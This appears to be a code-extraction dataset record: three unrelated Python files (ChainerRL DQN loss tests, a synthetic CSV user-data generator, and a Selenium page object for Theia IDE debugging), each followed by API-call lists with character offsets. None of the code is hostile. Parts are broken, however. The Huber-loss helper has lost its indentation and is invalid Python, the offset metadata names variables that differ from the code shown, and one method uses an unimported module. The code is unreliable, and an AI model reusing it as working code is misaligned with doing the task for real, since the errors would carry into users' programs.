from basetest_training import _TestBatchTrainingMixin
class TestDQNOnDiscreteABC(
        _TestBatchTrainingMixin, base._TestDQNOnDiscreteABC):

    def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
        """Create a plain DQN agent for the discrete-action ABC test env."""
        agent_config = dict(
            gpu=gpu,
            gamma=0.9,
            explorer=explorer,
            replay_start_size=100,
            target_update_interval=100,
        )
        return DQN(q_func, opt, rbuf, **agent_config)
class TestDQNOnDiscreteABCBoltzmann(
        _TestBatchTrainingMixin, base._TestDQNOnDiscreteABC):

    def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
        """Create a DQN agent that uses Boltzmann exploration.

        The passed-in ``explorer`` is deliberately ignored and replaced by
        a Boltzmann explorer.
        """
        boltzmann_explorer = chainerrl.explorers.Boltzmann()
        return DQN(q_func, opt, rbuf, gpu=gpu, gamma=0.9,
                   explorer=boltzmann_explorer,
                   replay_start_size=100, target_update_interval=100)
class TestDQNOnContinuousABC(
        _TestBatchTrainingMixin, base._TestDQNOnContinuousABC):

    def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
        """Create a plain DQN agent for the continuous-action ABC test env."""
        agent_config = dict(
            gpu=gpu,
            gamma=0.9,
            explorer=explorer,
            replay_start_size=100,
            target_update_interval=100,
        )
        return DQN(q_func, opt, rbuf, **agent_config)
# Batch training with recurrent models is currently not supported
class TestDQNOnDiscretePOABC(base._TestDQNOnDiscretePOABC):

    def make_dqn_agent(self, env, q_func, opt, explorer, rbuf, gpu):
        """Create a recurrent DQN agent (episodic updates) for the PO env."""
        return DQN(q_func, opt, rbuf, gpu=gpu, gamma=0.9,
                   explorer=explorer, replay_start_size=100,
                   target_update_interval=100, episodic_update=True)
def _huber_loss_1(a):
if abs(a) < 1:
return 0.5 * a ** 2
else:
return abs(a) - 0.5
@testing.parameterize(
    *testing.product({
        'batch_accumulator': ['mean', 'sum'],
        'clip_delta': [True, False],
    })
)
class TestComputeValueLoss(unittest.TestCase):
    """Checks the value-loss helpers against a NumPy reference."""

    def setUp(self):
        self.y = np.asarray([1.0, 2.0, 3.0, 4.0], dtype='f')
        self.t = np.asarray([2.1, 2.2, 2.3, 2.4], dtype='f')
        diffs = self.y - self.t
        if self.clip_delta:
            # Huber loss (delta=1) is the clipped reference.
            self.gt_losses = np.asarray([_huber_loss_1(d) for d in diffs])
        else:
            # Plain squared loss is the unclipped reference.
            self.gt_losses = np.asarray([0.5 * d ** 2 for d in diffs])

    def _reference_loss(self, weights=None):
        """Accumulate the elementwise reference losses like the tested code."""
        losses = self.gt_losses if weights is None else self.gt_losses * weights
        return losses.mean() if self.batch_accumulator == 'mean' else losses.sum()

    def test_not_weighted(self):
        loss = compute_value_loss(
            self.y, self.t, clip_delta=self.clip_delta,
            batch_accumulator=self.batch_accumulator).array
        self.assertAlmostEqual(loss, self._reference_loss(), places=5)

    def test_uniformly_weighted(self):
        # Weights of one must reproduce the unweighted loss exactly.
        uniform = np.ones(self.y.size, dtype='f')
        loss_w1 = compute_weighted_value_loss(
            self.y, self.t, clip_delta=self.clip_delta,
            batch_accumulator=self.batch_accumulator,
            weights=uniform).array
        self.assertAlmostEqual(loss_w1, self._reference_loss(), places=5)

    def test_randomly_weighted(self):
        random_weights = np.random.uniform(
            low=0, high=2, size=self.y.size).astype('f')
        loss_wu = compute_weighted_value_loss(
            self.y, self.t, clip_delta=self.clip_delta,
            batch_accumulator=self.batch_accumulator,
            weights=random_weights).array
        self.assertAlmostEqual(
            loss_wu, self._reference_loss(random_weights), places=5)
|
[
"chainerrl.agents.dqn.DQN",
"chainerrl.explorers.Boltzmann",
"chainer.testing.product",
"chainerrl.agents.dqn.compute_value_loss",
"numpy.random.uniform",
"future.standard_library.install_aliases",
"numpy.asarray",
"chainerrl.agents.dqn.compute_weighted_value_loss",
"numpy.ones"
] |
[((216, 250), 'future.standard_library.install_aliases', 'standard_library.install_aliases', ([], {}), '()\n', (248, 250), False, 'from future import standard_library\n'), ((756, 872), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100)\n', (759, 872), False, 'from chainerrl.agents.dqn import DQN\n'), ((1078, 1109), 'chainerrl.explorers.Boltzmann', 'chainerrl.explorers.Boltzmann', ([], {}), '()\n', (1107, 1109), False, 'import chainerrl\n'), ((1125, 1241), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100)\n', (1128, 1241), False, 'from chainerrl.agents.dqn import DQN\n'), ((1438, 1554), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100)\n', (1441, 1554), False, 'from chainerrl.agents.dqn import DQN\n'), ((1783, 1921), 'chainerrl.agents.dqn.DQN', 'DQN', (['q_func', 'opt', 'rbuf'], {'gpu': 'gpu', 'gamma': '(0.9)', 'explorer': 'explorer', 'replay_start_size': '(100)', 'target_update_interval': '(100)', 'episodic_update': '(True)'}), '(q_func, opt, rbuf, gpu=gpu, gamma=0.9, explorer=explorer,\n replay_start_size=100, target_update_interval=100, episodic_update=True)\n', (1786, 1921), False, 'from chainerrl.agents.dqn import DQN\n'), ((2291, 2334), 'numpy.asarray', 'np.asarray', (['[1.0, 2.0, 3.0, 4.0]'], {'dtype': '"""f"""'}), "([1.0, 
2.0, 3.0, 4.0], dtype='f')\n", (2301, 2334), True, 'import numpy as np\n'), ((2352, 2395), 'numpy.asarray', 'np.asarray', (['[2.1, 2.2, 2.3, 2.4]'], {'dtype': '"""f"""'}), "([2.1, 2.2, 2.3, 2.4], dtype='f')\n", (2362, 2395), True, 'import numpy as np\n'), ((3105, 3136), 'numpy.ones', 'np.ones', (['self.y.size'], {'dtype': '"""f"""'}), "(self.y.size, dtype='f')\n", (3112, 3136), True, 'import numpy as np\n'), ((2095, 2183), 'chainer.testing.product', 'testing.product', (["{'batch_accumulator': ['mean', 'sum'], 'clip_delta': [True, False]}"], {}), "({'batch_accumulator': ['mean', 'sum'], 'clip_delta': [True,\n False]})\n", (2110, 2183), False, 'from chainer import testing\n'), ((2569, 2622), 'numpy.asarray', 'np.asarray', (['[(0.5 * a ** 2) for a in self.y - self.t]'], {}), '([(0.5 * a ** 2) for a in self.y - self.t])\n', (2579, 2622), True, 'import numpy as np\n'), ((2687, 2795), 'chainerrl.agents.dqn.compute_value_loss', 'compute_value_loss', (['self.y', 'self.t'], {'clip_delta': 'self.clip_delta', 'batch_accumulator': 'self.batch_accumulator'}), '(self.y, self.t, clip_delta=self.clip_delta,\n batch_accumulator=self.batch_accumulator)\n', (2705, 2795), False, 'from chainerrl.agents.dqn import compute_value_loss\n'), ((3156, 3285), 'chainerrl.agents.dqn.compute_weighted_value_loss', 'compute_weighted_value_loss', (['self.y', 'self.t'], {'clip_delta': 'self.clip_delta', 'batch_accumulator': 'self.batch_accumulator', 'weights': 'w1'}), '(self.y, self.t, clip_delta=self.clip_delta,\n batch_accumulator=self.batch_accumulator, weights=w1)\n', (3183, 3285), False, 'from chainerrl.agents.dqn import compute_weighted_value_loss\n'), ((3690, 3819), 'chainerrl.agents.dqn.compute_weighted_value_loss', 'compute_weighted_value_loss', (['self.y', 'self.t'], {'clip_delta': 'self.clip_delta', 'batch_accumulator': 'self.batch_accumulator', 'weights': 'wu'}), '(self.y, self.t, clip_delta=self.clip_delta,\n batch_accumulator=self.batch_accumulator, weights=wu)\n', (3717, 3819), False, 
'from chainerrl.agents.dqn import compute_weighted_value_loss\n'), ((3608, 3658), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0)', 'high': '(2)', 'size': 'self.y.size'}), '(low=0, high=2, size=self.y.size)\n', (3625, 3658), True, 'import numpy as np\n')]
|
import csv
import os

# Synthetic-dataset generator: writes one CSV per fake user under ``directory``.
# Each file has ``features_num`` columns and ``ROW_NUM - 1`` data rows whose
# cells encode "<user>_<feature>_<row>", so injected anomalies are traceable.
# (Originally driven via execfile from the anomaly_generator project.)
ROW_NUM = 100
# NOTE: not used by the generation loop below; kept so existing readers of
# this module-level constant keep working.
path = "C:\\Users\\YONI\\Documents\\anomally_detector\\data_sets\\example\\"
users_num = 100
features_num = 20
directory = "data_sets\\"

# exist_ok avoids the check-then-create race of os.path.exists + os.makedirs.
os.makedirs(directory, exist_ok=True)

users = [f"user{i}" for i in range(users_num)]
features = [f"feature{i}" for i in range(features_num)]

for user in users:
    with open(directory + user + ".csv", "w") as csvfile:
        writer = csv.DictWriter(csvfile, delimiter=",", lineterminator="\n",
                                fieldnames=features)
        writer.writeheader()
        # Row indices deliberately start at 1 (the header line is "row 0").
        for i in range(1, ROW_NUM):
            writer.writerow({feature: f"{user}_{feature}_{i}" for feature in features})
|
[
"os.path.exists",
"os.makedirs",
"csv.DictWriter"
] |
[((310, 335), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (324, 335), False, 'import os\n'), ((338, 360), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (349, 360), False, 'import os\n'), ((600, 685), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'delimiter': '""","""', 'lineterminator': '"""\n"""', 'fieldnames': 'features'}), "(csvfile, delimiter=',', lineterminator='\\n', fieldnames=features\n )\n", (614, 685), False, 'import csv\n')]
|
# Copyright (c) 2020 Broadcom.
# The term "Broadcom" refers to Broadcom Inc. and/or its subsidiaries.
#
# This program and the accompanying materials are made
# available under the terms of the Eclipse Public License 2.0
# which is available at https://www.eclipse.org/legal/epl-2.0/
#
# SPDX-License-Identifier: EPL-2.0
#
# Contributors:
# Broadcom, Inc. - initial API and implementation
import json
import os
import pyperclip
from robot.api.deco import keyword
from selenium.common.exceptions import NoSuchElementException, WebDriverException, TimeoutException
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from inc.cfg.env_constants import TEST_FILES_DIR
from inc.exceptions.custom_timeout_exception import CustomTimeoutException
from inc.exceptions.element_not_found_exception import ElementNotFoundException
from inc.exceptions.general_exception import GeneralException
from inc.helpers import highlight
from inc.theia.main_menu import MainMenu
from inc.theia.ui import UI
from lib.common_engine import CommonEngine
from inc.decorators.wait_till_exist import WaitTillExist
from inc.theia import constants, lsp_constants
from lib.monako_editor import MonakoEditor
class FileExplorer(CommonEngine):
    """Page object for the Theia IDE shell.

    Wraps the file-explorer panel, the debug toolbar (start/step/continue/stop),
    modal dialogs, the status bar and clipboard helpers. Several methods are
    exposed to Robot Framework via @keyword; retry semantics come from the
    @WaitTillExist decorator.
    """
    def __init__(self, url=None):
        """Delegate to CommonEngine; *url* is the optional IDE URL."""
        super(FileExplorer, self).__init__(url)
    def is_file_explorer_visible(self):
        """Return True when both the left panel and the Files view are visible.

        Visibility means neither element carries the "collapsed" class and the
        Files view is not hidden. A missing Files element counts as hidden;
        any other failure is wrapped in GeneralException.
        """
        panel_state = explorer_state = constants.STATE_HIDDEN
        theia_left_panel = self.find_it(UI.get_theia_left_panel_locator())
        if constants.THEIA_ELEMENT_COLLAPSED not in theia_left_panel.get_attribute(constants.TYPE_CLASS):
            panel_state = constants.STATE_VISIBLE
        try:
            file_explorer_id_element = self.find_it(UI.get_files_explorer_locator())
            explorer_classes = file_explorer_id_element.get_attribute(constants.TYPE_CLASS)
            if constants.THEIA_ELEMENT_COLLAPSED not in explorer_classes and \
                    constants.THEIA_HIDDEN not in explorer_classes:
                explorer_state = constants.STATE_VISIBLE
        except (NoSuchElementException, ElementNotFoundException):
            # Files view not present at all -> treated as hidden.
            pass
        except Exception:
            raise GeneralException(self.get_driver(), call_from=self.is_file_explorer_visible.__name__)
        return constants.STATE_HIDDEN not in [panel_state, explorer_state]
    def make_sure_debug_button_is_here(self):
        """Return the Debug tab element, opening it via the main menu if absent."""
        theia_locator = UI.get_theia_left_panel_locator()
        WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
            expected_conditions.presence_of_element_located(theia_locator)
        )
        theia_left_panel = self.find_it(theia_locator)
        highlight(theia_left_panel)
        try:
            return self.find_it(UI.get_debug_tab_locator())
        except (NoSuchElementException, ElementNotFoundException):
            # Tab not shown yet: invoke the Debug menu entry, then retry once.
            menu = MainMenu(self.get_driver())
            menu.invoke_menu_path(constants.Debug)
            return self.find_it(UI.get_debug_tab_locator())
    @WaitTillExist()
    def show_file_explorer(self):
        """Click the Files tab unless the explorer is already visible."""
        if not self.is_file_explorer_visible():
            file_explorer_id_element = self.find_it(UI.get_files_explorer_tab_locator())
            self.click_me(file_explorer_id_element)
        else:
            print("visible?")
    @WaitTillExist(timeout=constants.DEFAULT_HUGE_TIMEOUT, interval=10)
    def wait_for_theia_loaded(self):
        """Poll (via decorator) until the Theia side panels exist in the DOM.

        Raises WebDriverException when the panel is not found so WaitTillExist
        keeps retrying until its (huge) timeout expires.
        """
        # self.switch_to_theia_frame()
        theia_panel_locator = UI.get_theia_left_right_panel_locator()
        try:
            theia_panel = self.find_it(theia_panel_locator)
            highlight(theia_panel)
        except ElementNotFoundException:
            raise WebDriverException
        except Exception:
            raise
    def show_debug_tab(self):
        """Switch the left panel to the Debug tab if it is not the current one."""
        debug_id_element = self.make_sure_debug_button_is_here()
        highlight(debug_id_element)
        if not self.current_left_tab(debug_id_element):
            self.click_me(debug_id_element)
    def start_debug(self):
        """Click Start Debug, wait for a debug thread, return the current editor line."""
        debug_start_locator = UI.get_debug_start_locator()
        WebDriverWait(self._driver, constants.DEFAULT_LONG_TIMEOUT).until(
            expected_conditions.presence_of_element_located(debug_start_locator)
        )
        theia_locator = UI.get_theia_left_panel_locator()
        theia_panel = self.find_it(theia_locator)
        debug_start_button = self.find_it(debug_start_locator, parent=theia_panel)
        highlight(debug_start_button, effect_time=1)
        self.click_me(debug_start_button, element_human_name="Start Debug")
        # A thread node in the debug view signals the session actually started.
        debug_thread_locator = UI.get_debug_thread_locator()
        WebDriverWait(self._driver, constants.DEFAULT_LONG_TIMEOUT).until(
            expected_conditions.presence_of_element_located(debug_thread_locator)
        )
        editor_obj = self.get_editor_obj()
        line_num = editor_obj.get_current_line_num()
        return line_num
    def debug_step_over(self):
        """Click Step Over and return the editor line number after the step."""
        debug_step_over_locator = UI.get_debug_step_over_locator()
        WebDriverWait(self._driver, constants.DEFAULT_LONG_TIMEOUT).until(
            expected_conditions.presence_of_element_located(debug_step_over_locator)
        )
        editor_obj = self.get_editor_obj()
        editor = editor_obj.get_editor_element()
        step_locator = UI.get_debug_top_stack_frame_locator()
        step_element = self.find_it(step_locator, parent=editor)
        highlight(step_element, effect_time=1)
        theia_locator = UI.get_theia_left_panel_locator()
        theia_panel = self.find_it(theia_locator)
        debug_step_over_button = self.find_it(debug_step_over_locator, parent=theia_panel)
        highlight(debug_step_over_button, effect_time=1)
        self.click_me(debug_step_over_button, element_human_name="Step Over")
        # possible variants after step: determine what to wait here for
        # theia-debug-top-stack-frame - exists, theia-debug-top-stack-frame-line - exists and line num increased
        # or
        # theia-debug-top-stack-frame - exists, theia-debug-top-stack-frame-line - doesn't exist and line num unchanged
        try:
            # Short wait: the old frame marker may disappear, or may not (see above).
            WebDriverWait(self._driver, constants.DEFAULT_SHORT_TIMEOUT).until(
                expected_conditions.invisibility_of_element_located(step_locator)
            )
        except TimeoutException:
            pass
        WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
            expected_conditions.presence_of_element_located(step_locator)
        )
        line_after_step = editor_obj.get_current_line_num()
        print("line after debug step", line_after_step)
        step_element = self.find_it(step_locator, parent=editor)
        highlight(step_element, effect_time=1)
        return line_after_step
    def debug_continue(self, file_is_opened=True):
        """Click Continue; when *file_is_opened*, wait for the next stop and
        return the editor line number, otherwise return None immediately."""
        debug_continue_locator = UI.get_debug_continue_locator()
        WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
            expected_conditions.presence_of_element_located(debug_continue_locator)
        )
        editor_obj = self.get_editor_obj()
        editor = editor_obj.get_editor_element()
        step_locator = UI.get_debug_top_stack_frame_locator()
        if file_is_opened:
            step_element = self.find_it(step_locator, parent=editor)
            highlight(step_element, effect_time=1)
        theia_locator = UI.get_theia_left_panel_locator()
        theia_panel = self.find_it(theia_locator)
        debug_continue_button = self.find_it(debug_continue_locator, parent=theia_panel)
        highlight(debug_continue_button, effect_time=1)
        self.click_me(debug_continue_button, element_human_name="Continue")
        if not file_is_opened:
            return None
        try:
            # The old frame marker may briefly vanish before the next stop.
            WebDriverWait(self._driver, constants.DEFAULT_SHORT_TIMEOUT).until(
                expected_conditions.invisibility_of_element_located(step_locator)
            )
        except TimeoutException:
            pass
        WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
            expected_conditions.presence_of_element_located(step_locator)
        )
        line_after_continue = editor_obj.get_current_line_num()
        print("line after debug continue", line_after_continue)
        step_element = self.find_it(step_locator, parent=editor)
        highlight(step_element, effect_time=1)
        return line_after_continue
    @WaitTillExist(timeout=constants.DEFAULT_LONG_TIMEOUT)
    def wait_for_debug_to_stop(self):
        """Poll (via decorator) until no debug thread node remains in the panel.

        Finding a thread raises WebDriverException to trigger a retry; its
        absence (Not-Found) means the session ended and the method returns.
        """
        theia_locator = UI.get_theia_left_panel_locator()
        theia_panel = self.find_it(theia_locator)
        debug_thread_locator = UI.get_debug_thread_locator()
        try:
            thread_element = self.find_it(debug_thread_locator, parent=theia_panel)
            highlight(thread_element)
            raise WebDriverException
        except (NoSuchElementException, ElementNotFoundException):
            return
        except Exception:
            raise
    def open_preferences(self):
        """Open the Preferences view through the main menu."""
        menu = MainMenu(self.get_driver())
        menu.invoke_menu_path(constants.Preferences)
    @WaitTillExist()
    def get_variables_elements(self, parent=None):
        """Return debug-console variable elements under *parent*; retry when empty."""
        variables_elements = self.find_them(UI.get_debug_console_variable_locator(), parent=parent)
        if not len(variables_elements):
            raise WebDriverException
        return variables_elements
    @WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT)
    def check_variable_is_updated(self, text, value):
        """Retry until the "name: value" string *text* carries *value* after the colon."""
        variable_value = text.split(":")[1].strip()
        if str(variable_value) != str(value):
            raise WebDriverException
    def get_variable_element(self, var_name, var_value=None):
        """Return the Locals-tree element for *var_name* (case-insensitive).

        Expands the Variables header and its "Locals" subtree first. When
        *var_value* is given, also waits for each inspected variable's value to
        match it. Raises ElementNotFoundException when no Locals tree exists
        and NoSuchElementException when the variable is not listed.
        """
        editor_obj = self.get_editor_obj()
        variables_header = editor_obj.find_variables_header()
        highlight(variables_header, effect_time=1)
        self.expand_tree(variables_header)
        variables_container = self.get_parent_node(variables_header)
        highlight(variables_container, effect_time=1)
        locals_trees = self.find_them(UI.get_tree_node_content_locator(), parent=variables_container)
        locals_found = False
        locals_tree = None
        for locals_tree in locals_trees:
            if locals_tree.text.upper() == constants.THEIA_LOCALS.upper():
                locals_found = True
                break
        if not locals_found:
            raise ElementNotFoundException(self.get_driver(), call_from=self.get_variable_element.__name__)
        self.expand_tree(locals_tree)
        variable_elements = self.get_variables_elements(parent=variables_container)
        for variable_element in variable_elements:
            highlight(variable_element, effect_time=1)
            full_var_text = variable_element.text
            variable_name = full_var_text.split(":")[0]
            if var_value is not None:
                self.check_variable_is_updated(full_var_text, var_value)
                print("Current variable '{0}' value: '{1}'".format(var_name, var_value))
            print("variable_name", variable_name)
            if variable_name.upper() == var_name.upper():
                return variable_element
        raise NoSuchElementException
    def expand_directory_node(self, dir_node, empty_node=False, timeout=None):
        """Expand *dir_node* inside the file-explorer content tree."""
        content = self.find_file_explorer_content()
        self.expand_tree_node(dir_node, content, empty_node=empty_node, timeout=timeout)
    @staticmethod
    def is_directory(dir_node):
        """Return True when *dir_node*'s class attribute marks it as a directory."""
        return constants.THEIA_DIR_NODE in dir_node.get_attribute(constants.TYPE_CLASS)
    @WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT)
    def enter_in_dialog(self, input_msg, dlg_title=None):
        """Type *input_msg* into the input field of the dialog titled *dlg_title*."""
        dialog_shell = self.find_it(UI.get_theia_dialog_shell_locator())
        dialog_title = self.find_it(UI.get_theia_dialog_title_locator(), parent=dialog_shell)
        if dialog_title.text.upper() != dlg_title.upper():
            # NOTE(review): raises the exception class itself, without the
            # driver/call_from args used elsewhere — confirm this is intended.
            raise ElementNotFoundException
        dialog_content = self.find_it(UI.get_theia_dialog_content_locator(), parent=dialog_shell)
        input_element = dialog_content.find_element(By.XPATH, "./input")
        self.input_value(input_msg, input_element=input_element)
    @WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT)
    def answer_ok_to_dialog(self, dlg_title):
        """Click the OK button of the dialog titled *dlg_title* (case-insensitive)."""
        dialog_shell = self.find_it(UI.get_theia_dialog_shell_locator())
        dialog_title = self.find_it(UI.get_theia_dialog_title_locator(), parent=dialog_shell)
        if dialog_title.text.upper() != dlg_title.upper():
            # NOTE(review): bare class raise, as in enter_in_dialog — confirm.
            raise ElementNotFoundException
        dialog_control = self.find_it(UI.get_theia_dialog_control_locator(), parent=dialog_shell)
        control_buttons = self.find_them(UI.get_buttons_locator(), parent=dialog_control)
        for control_button in control_buttons:
            button_text = control_button.text
            if button_text.upper() == constants.OK.upper():
                self.click_me(control_button, element_human_name=constants.OK, effect_time=1)
    @WaitTillExist(timeout=constants.DEFAULT_SHORT_TIMEOUT, should_exist=False, do_dump=False)
    def close_dialog(self):
        """Best-effort dismissal (via ESC) of a known bug dialog, if present.

        NOTE(review): ``che_constants`` is not imported in this module, so the
        title comparison raises NameError, which the except below converts to
        WebDriverException — presumably the import was dropped; confirm the
        source module (e.g. an ``inc.theia.che_constants``).
        """
        try:
            self.switch_to_theia_frame()
            dialog_shell = self.find_it(UI.get_theia_dialog_shell_locator())
            dialog_title = self.find_it(UI.get_theia_dialog_title_locator(), parent=dialog_shell)
            highlight(dialog_title)
            if dialog_title.text.upper() == che_constants.CHE_BUG_TITLE.upper():
                self.send_key_sequence([Keys.ESCAPE, Keys.ESCAPE, Keys.ESCAPE])
        except Exception as e:
            raise WebDriverException(msg=e.args)
    def get_stop_debug_button(self):
        """Return the enabled Stop Debug button, or None when it is disabled."""
        debug_stop_locator = UI.get_debug_stop_locator()
        WebDriverWait(self._driver, constants.DEFAULT_TIMEOUT).until(
            expected_conditions.presence_of_element_located(debug_stop_locator)
        )
        theia_locator = UI.get_theia_left_panel_locator()
        theia_panel = self.find_it(theia_locator)
        debug_stop_button = self.find_it(debug_stop_locator, parent=theia_panel)
        if constants.THEIA_MOD_DISABLED in debug_stop_button.get_attribute(constants.TYPE_CLASS):
            debug_stop_button = None
        return debug_stop_button
    def stop_debug(self, retry=False):
        """Stop the debug session; with *retry*, attempt a second stop on timeout."""
        debug_stop_button = self.get_stop_debug_button()
        if debug_stop_button is None:
            # Button disabled -> no session is running; nothing to stop.
            return
        highlight(debug_stop_button, effect_time=1)
        self.click_me(debug_stop_button, element_human_name="Stop Debug")
        try:
            self.wait_for_debug_to_stop()
        except (TimeoutException, CustomTimeoutException):
            if retry:
                print("Retry to stop debug")
                debug_stop_button = self.get_stop_debug_button()
                if debug_stop_button is None:
                    return
                highlight(debug_stop_button, effect_time=1)
                self.click_me(debug_stop_button, element_human_name="Stop Debug")
                self.wait_for_debug_to_stop()
            else:
                raise
        except Exception:
            raise
    @staticmethod
    def current_left_tab(left_tab_element):
        """Return True when *left_tab_element* is the currently selected left tab."""
        left_tab_element_classes = left_tab_element.get_attribute(constants.TYPE_CLASS)
        return constants.THEIA_CURRENT_TAB in left_tab_element_classes
    @keyword("Get Syntax Ok Message For ${member}")
    def get_for_member_syntax_ok_message(self, member):
        """Robot keyword: format the LSP COBOL "syntax OK" message for *member*."""
        full_message = lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format(member)
        return full_message
    @keyword("Get Editor")
    def get_editor_obj(self):
        """Robot keyword: return a MonakoEditor bound to the current driver."""
        editor = MonakoEditor(self.get_driver())
        return editor
    @keyword("See ${text} In Statusbar")
    def status_bar_should_have_text(self, text):
        """Robot keyword: assert the status bar contains an element whose text
        equals *text* exactly; raises NoSuchElementException otherwise."""
        theia_status_bar = self.find_it(UI.get_theia_statusbar_locator())
        elements_with_commands = self.find_them(UI.get_status_elements(), parent=theia_status_bar)
        for elements_with_command in elements_with_commands:
            if elements_with_command.text == text:
                highlight(elements_with_command, effect_time=1)
                return
        raise NoSuchElementException
    def select_all(self):
        """Send Ctrl+A to the browser (select all)."""
        # actions = [
        #     {
        #         "action": "key_down",
        #         "value": Keys.CONTROL
        #     },
        #     {
        #         "actions": "send_keys",
        #         "value": "a"
        #     },
        #     {
        #         "action": "key_up",
        #         "value": Keys.CONTROL
        #     }
        # ]
        # self.execute_key_sequence(actions)
        #
        # return
        actions = ActionChains(self.get_driver())
        actions.key_down(Keys.CONTROL)
        actions.send_keys("a")
        actions.key_up(Keys.CONTROL)
        actions.perform()
    def copy_to_clipboard(self):
        """Send Ctrl+C to the browser (copy)."""
        actions = ActionChains(self.get_driver())
        actions.key_down(Keys.CONTROL)
        actions.send_keys("c")
        actions.key_up(Keys.CONTROL)
        actions.perform()
    def paste_from_clipboard(self):
        """Send Ctrl+V to the browser (paste)."""
        actions = ActionChains(self.get_driver())
        actions.key_down(Keys.CONTROL)
        actions.send_keys("v")
        actions.key_up(Keys.CONTROL)
        actions.perform()
    def save_file(self):
        """Send Ctrl+S to the browser (save)."""
        actions = ActionChains(self.get_driver())
        actions.key_down(Keys.CONTROL)
        actions.send_keys("s")
        actions.key_up(Keys.CONTROL)
        actions.perform()
    @staticmethod
    def clear_clipboard():
        """Empty the OS clipboard (pyperclip) on the test-runner machine."""
        clb_type = pyperclip.determine_clipboard()
        print("clipboard", clb_type)
        pyperclip.copy("")
    @staticmethod
    def get_from_clipboard(json_format=True):
        """Read the OS clipboard; with *json_format*, parse it as JSON.

        Returns the content re-serialized with json.dumps(indent=3); note the
        dump is applied even when json_format is False (a plain string is then
        returned JSON-quoted).
        """
        res = pyperclip.paste()
        print("clipboard res: '{0}' - '{1}'".format(res, type(res)))
        if json_format:
            res = json.loads(res)
            print("json res: '{0}' - '{1}'".format(res, type(res)))
        return json.dumps(res, indent=3)
    @staticmethod
    def get_to_clipboard(value):
        """Put *value* onto the OS clipboard (pyperclip) on the test-runner machine."""
        pyperclip.copy(value)
    @staticmethod
    @keyword("Modify User Preferences")
    def append_dict(pref_dict, merge_dict):
        """Robot keyword: merge *merge_dict* into *pref_dict* (dict or JSON string)
        and return the result as an indented JSON string."""
        if isinstance(pref_dict, str):
            pref_dict = json.loads(pref_dict)
        for key in merge_dict:
            pref_dict[key] = merge_dict[key]
        return json.dumps(pref_dict, indent=3)
|
[
"selenium.common.exceptions.WebDriverException",
"pyperclip.determine_clipboard",
"inc.theia.ui.UI.get_files_explorer_locator",
"json.dumps",
"inc.theia.ui.UI.get_debug_top_stack_frame_locator",
"inc.theia.constants.OK.upper",
"inc.theia.ui.UI.get_theia_statusbar_locator",
"inc.theia.ui.UI.get_debug_stop_locator",
"inc.theia.ui.UI.get_debug_step_over_locator",
"inc.theia.lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format",
"pyperclip.paste",
"json.loads",
"inc.theia.ui.UI.get_debug_tab_locator",
"inc.theia.ui.UI.get_files_explorer_tab_locator",
"inc.theia.ui.UI.get_debug_continue_locator",
"inc.theia.ui.UI.get_status_elements",
"inc.theia.ui.UI.get_theia_left_right_panel_locator",
"inc.theia.ui.UI.get_buttons_locator",
"inc.theia.ui.UI.get_theia_dialog_title_locator",
"inc.theia.ui.UI.get_debug_thread_locator",
"inc.theia.ui.UI.get_debug_console_variable_locator",
"inc.theia.ui.UI.get_debug_start_locator",
"inc.theia.constants.THEIA_LOCALS.upper",
"inc.theia.ui.UI.get_theia_dialog_control_locator",
"pyperclip.copy",
"inc.theia.ui.UI.get_tree_node_content_locator",
"selenium.webdriver.support.expected_conditions.presence_of_element_located",
"robot.api.deco.keyword",
"inc.theia.ui.UI.get_theia_dialog_shell_locator",
"selenium.webdriver.support.expected_conditions.invisibility_of_element_located",
"selenium.webdriver.support.wait.WebDriverWait",
"inc.theia.ui.UI.get_theia_left_panel_locator",
"inc.theia.ui.UI.get_theia_dialog_content_locator",
"inc.decorators.wait_till_exist.WaitTillExist",
"inc.helpers.highlight"
] |
